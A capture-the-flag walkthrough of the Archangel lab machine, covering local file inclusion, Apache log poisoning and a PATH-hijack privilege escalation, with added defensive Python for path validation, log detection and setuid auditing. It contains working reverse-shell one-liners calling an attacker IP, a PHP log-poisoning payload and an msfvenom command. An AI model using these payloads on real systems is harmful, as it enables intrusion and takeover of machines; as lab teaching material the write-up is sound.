# Archangel

![](/files/-MbrX80KTbrXtv_a2yzp)

## Reconnaissance

Initial nmap scan to find open ports, using the flag "treat all hosts as alive" (**-Pn**):

```
nmap -Pn 10.10.104.47
```

![](/files/-MbsAAFMexH1EeUPukA2)

Detailed Nmap scan:

Command breakdown:

* (**-sV**): Service version
* (**-sC**): Default nmap scripts
* (**-p**): Specifying ports 22,80
* (**-oN nmap**): Saving it into a file called nmap

```
nmap -sV -sC -p 22,80 -oN nmap 10.10.104.47
```

![](/files/-MbsADs8OwUgA7E2NjJ9)

## Enumeration

Let's visit the webpage.

![](/files/-MbsB1sNl6_zwscPQUWh)

Looking at the page, we see a domain. Let's add it to our `/etc/hosts` file.

![](/files/-MbsBGiPfbKhTUqKWcKw)

Now let's go to the webpage.

![](/files/-MbsBNMS99hQOR-DGc5i)

We have the first flag

![](/files/-MbsBRbP15yH3N_OK_Qn)

Let's look for a `robots.txt` file, as we usually find important pages listed there.

![](/files/-MbsBeBIonPl-zOkBQZJ)

And we found one. Let's visit it.

![](/files/-MbsBkPo2kgmPIbxiqTX)

The page has a button. Let's press it.

![](/files/-MbsBrloQspSUp8ZGOQc)

It takes us to a different page. Looking at the URL, the `view` parameter is navigating through the directories, so let's try some LFI techniques to find vulnerabilities. I was searching on Google when I found this.

![](/files/-MbsCNHGTMx-7AjiDSAO)

## Exploitation

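They say that we can use this URL to bypass the filter and get an LFI vulnerability. The `php://filter` wrapper base64-encodes the target file before it is included, so the PHP source is returned as text instead of being executed. Let's test it out.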

```
http://xqi.cc/index.php?m=php://filter/convert.base64-encode/resource=index
```

Let's adapt this URL to our page and PHP file.

```
http://mafialive.thm/test.php?view=php://filter/convert.base64-encode/resource=/var/www/html/development_testing/mrrobot.php
```

When we replace the current URL with this one, we get this

![](/files/-MbsCwngPr2mBF5mRdx0)

It's a `base64` encoded string. When we decode it, we get the message from earlier.

![](/files/-MbsDGZkPkhTqzx5Rr_b)

Now let's try to read other pages like `test.php`.

![](/files/-MbsDdjJfcejjFqUnx60)

We get another base64 encoded string. Let's decode it.

![](/files/-MbsDpBMEzvcrojp6ILb)

We have the second flag.

![](/files/-MbsDygrjZNnRhwU3o-O)

Let's now look at the code closely.

![](/files/-MbsEhT5ezmcaKuvcy7f)

In line 17 we can see the conditions. The first one is that the parameter should not contain the substring `../../` and the second one is that the parameter must contain the string `/var/www/html/development_testing`. So for the first condition we can write `../../../` as `.././.././../`, the form used in the URL below.
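Why the two substring conditions fail, and what a path check should do instead, as an added example that is not the code from the room or from this write-up. `weak_filter` is a Python model of the conditions described above, and `hardened_filter` is a hypothetical replacement that canonicalises the path before comparing it.

```python
import posixpath

BASE = "/var/www/html/development_testing"   # directory named in the check above

def weak_filter(view: str) -> bool:
    """Model of the two substring conditions described in the text."""
    return "../../" not in view and BASE in view

def hardened_filter(view: str) -> bool:
    """Canonicalise first, then require the result to stay under BASE."""
    if "\x00" in view or "://" in view:       # no NUL bytes, no stream wrappers
        return False
    resolved = posixpath.normpath(posixpath.join(BASE, view))
    return resolved == BASE or resolved.startswith(BASE + "/")

# Constructed inputs: one legitimate page plus the two request shapes on this page
SAMPLES = [
    "/var/www/html/development_testing/mrrobot.php",
    "/var/www/html/development_testing/.././.././../log/apache2/access.log",
    "php://filter/convert.base64-encode/resource="
    "/var/www/html/development_testing/mrrobot.php",
]

def compare(samples=SAMPLES):
    """Return (weak verdict, hardened verdict) for each sample."""
    return [(weak_filter(s), hardened_filter(s)) for s in samples]

if __name__ == "__main__":
    for sample, (weak, hard) in zip(SAMPLES, compare()):
        print(f"weak={weak!s:5} hardened={hard!s:5} {sample}")
```

In the PHP application itself the equivalent is to compare `realpath()` output against the base directory, or better, to map the parameter to a fixed allowlist of page names.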

We know that this is running on an Apache web server, so there should be an `access.log` file. Let's check if we can access it.

```
http://mafialive.thm/test.php?view=/var/www/html/development_testing/.././.././../log/apache2/access.log
```

![](/files/-MbsOQspbYXjQIpA4_yf)

Now we can try log poisoning to get Remote Code Execution (RCE). We have to send this reverse shell in the request.

```
<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.13.8.64 1234 >/tmp/f');?>
```

Make sure to set up a netcat listener

![](/files/-MbsRYuSZhf5j4wNTtHC)

First we have to intercept the request and pass this code in the User-Agent header.

![](/files/-MbsRtSOfM7CZhy5z-kd)

And now if we send the request we get a reverse shell.

![](/files/-MbsS-ZtkWgicnpVdGId)
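What this sequence leaves behind in the web server log, as an added detection example that is not part of the original write-up. The log lines are constructed (documentation IP addresses and a harmless PHP marker), and the rule names are this example's own.

```python
import re
from urllib.parse import unquote

# Apache "combined" format: host ident user [time] "request" status bytes "referer" "agent"
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(.*?)" (\d{3}) \S+ "(.*?)" "(.*)"$')

RULES = {
    # PHP open tag stored in a header that the server writes to the log verbatim
    "php_tag_in_header": lambda req, ref, ua: "<?" in ua or "<?" in ref,
    # php://filter and other PHP stream wrappers in the request line
    "stream_wrapper": lambda req, ref, ua: "php://" in req.lower(),
    # directory traversal, including the .././ form that passes a "../../" check
    "traversal": lambda req, ref, ua: re.search(r"\.\.[/\\]", req) is not None,
    # a web request that names a server log file
    "log_file_include": lambda req, ref, ua: re.search(r"(access|error)\.log", req) is not None,
}

def scan(lines):
    """Return (line number, client, sorted rule names) for every suspicious entry."""
    findings = []
    for number, line in enumerate(lines, 1):
        match = LINE.match(line)
        if not match:
            continue
        host, req, _status, ref, ua = match.groups()
        req = unquote(unquote(req))           # undo single and double URL encoding
        hits = sorted(name for name, rule in RULES.items() if rule(req, ref, ua))
        if hits:
            findings.append((number, host, hits))
    return findings

# Constructed sample log, not taken from the target machine
SAMPLE = [
    '192.0.2.10 - - [10/Jun/2021:10:00:01 +0000] "GET /test.php?view=/var/www/html/development_testing/mrrobot.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '192.0.2.66 - - [10/Jun/2021:10:02:11 +0000] "GET /test.php?view=php://filter/convert.base64-encode/resource=/var/www/html/development_testing/test.php HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '192.0.2.66 - - [10/Jun/2021:10:05:40 +0000] "GET / HTTP/1.1" 200 300 "-" "<?php echo 1; ?>"',
    '192.0.2.66 - - [10/Jun/2021:10:05:52 +0000] "GET /test.php?view=/var/www/html/development_testing/..%2F.%2F..%2F.%2F..%2Flog/apache2/access.log HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

A `php_tag_in_header` hit followed by a `log_file_include` hit from the same client is the pattern to alert on; each rule alone is noisier.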

Now let's stabilize the shell.

![](/files/-MbsSH7wesPGkdMCxN-f)

We can read the user.txt file

![](/files/-MbsW0RXffyKMycOjfQW)

## Privilege Escalation

In archangel's `home/myfiles` directory there is a `passwordbackup` file. You can go check it out.

![](/files/-MbsWFSqUSy8sPy4UAfU)

```
https://www.youtube.com/watch?v=dQw4w9WgXcQ
```

We have another directory which might be interesting, called `secret`. Let's try to change directories into it.

![](/files/-MbsWpVfHJlQWCfGkTvm)

And we are not allowed. We need to be the user archangel to access this. Let's look at other files that are owned by archangel.

```
find / -user archangel -type f 2>/dev/null
```

![](/files/-MbsXfsJV4PjYXFNUTwO)

We find these. The first one looks interesting, so let's check it out.

![](/files/-MbsXvTcP1G7-YfnfguS)

It's a bash script. Let's look at the permissions to see if we can write to it.

![](/files/-MbsYfuACcEtLXMEHSKQ)

Looks like we can, so let's echo a reverse shell into the file and execute it to get a reverse shell.

```
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.13.8.64 1234 >/tmp/f
```

Also make sure to start a netcat reverse shell listener

![](/files/-MbsYvTngCdbJId_BM2G)

Now let's echo the reverse shell into the file and execute the file.

![](/files/-MbsZHPfnovw_EfjE4eb)

![](/files/-MbsZQ0bzcL6cRF2o7f2)

We are archangel now. Let's stabilize the shell.

![](/files/-MbsZdmYyKwNKguNKy3O)

Let's go into the secret directory.

![](/files/-MbsZo0wxeV04wKUIdM2)

We can read the `user2.txt` file. Let's read the other file called `backup`.

![](/files/-Mbs_3d0F4gUtQP7mHnx)

Looks like we can't read the output. Let's see what type of file it is.

![](/files/-Mbs_FfWN4WEyzGWQZNh)

It's an `LSB shared object`. Let's use the `strings` command to get more information.

![](/files/-Mbsa19ClktTAwkKl8U4)

This command is interesting: the `cp` command is run without the full path, which means that this is exploitable. Let's create an `msfvenom` payload called `cp` and adjust the `PATH` variable; when `backup` is executed we should get a reverse shell.

```
msfvenom -p linux/x64/shell_reverse_tcp -f elf -o cp LHOST=10.13.8.64 LPORT=1234
```

![](/files/-MbsagiN-qsz2AtYkNC3)

Now we have to transfer the file, so let's start an HTTP server.

```
python3 -m http.server 8000
```

![](/files/-MbsayyLO0uZUP8HPTKd)

Now use this command on the victim machine to download the file, make sure you are in the secret directory.

```
wget http://10.13.8.64:8000/cp
```

![](/files/-MbwM-2zH4y5SubdOXKn)

Now let's modify the `PATH` variable.

```
echo $PATH
export PATH=/home/archangel/secret:$PATH
echo $PATH
```

![](/files/-MbwLgqOEOScuwH9CzFA)

Now start a netcat listener and make the `cp` file executable.

![](/files/-MbwMDYRGwrwWnTxw8UO)

![](/files/-MbwMJSXiOu1vBKi8pvc)

Now run the backup file

![](/files/-MbwMTnjmbq54ylpKyQJ)

And you should get a reverse shell as root

![](/files/-MbwMYUpnc2p75iImsMt)
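The root cause of this step is a privileged binary that resolves `cp` through `PATH`. As an added example that is not part of the original write-up, this audit applies the same `strings`-style inspection to flag setuid/setgid files that embed commands by bare name; the `COMMON` list and the two sample byte strings are constructed assumptions.

```python
import os
import re
import shlex
import stat

PRINTABLE = re.compile(rb"[\x20-\x7e]{4,}")   # printable runs, as strings(1) reports
# Utilities commonly shelled out to; extend for your environment (assumption)
COMMON = {"cp", "mv", "rm", "cat", "tar", "chmod", "chown", "curl", "wget", "sh", "bash"}

def relative_commands(blob: bytes):
    """Return (command, string) for embedded shell lines that depend on PATH lookup."""
    hits = []
    for match in PRINTABLE.finditer(blob):
        text = match.group().decode("ascii")
        for part in re.split(r"[;&|]+", text):
            try:
                tokens = shlex.split(part)
            except ValueError:                # unbalanced quotes: not a shell line
                continue
            if len(tokens) >= 2 and tokens[0] in COMMON:
                hits.append((tokens[0], text.strip()))
    return hits

def audit(path):
    """Report bare command names only for files that run with elevated IDs."""
    mode = os.stat(path).st_mode
    if not mode & (stat.S_ISUID | stat.S_ISGID):
        return []
    with open(path, "rb") as handle:
        return relative_commands(handle.read())

# Constructed byte strings standing in for two builds of a setuid helper:
# WEAK shells out to a bare "cp"; FIXED executes /bin/cp by absolute path.
WEAK = b"\x7fELF\x02\x01\x01\x00setuid\x00system\x00cp /srv/data/* /srv/backup\x00"
FIXED = b"\x7fELF\x02\x01\x01\x00setuid\x00execve\x00/bin/cp\x00/srv/data\x00/srv/backup\x00"

if __name__ == "__main__":
    print("weak :", relative_commands(WEAK))
    print("fixed:", relative_commands(FIXED))
```

The fix in the binary itself is to call the utility by absolute path, or to set a fixed `PATH` before spawning anything, and to drop the setuid bit where it is not needed.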

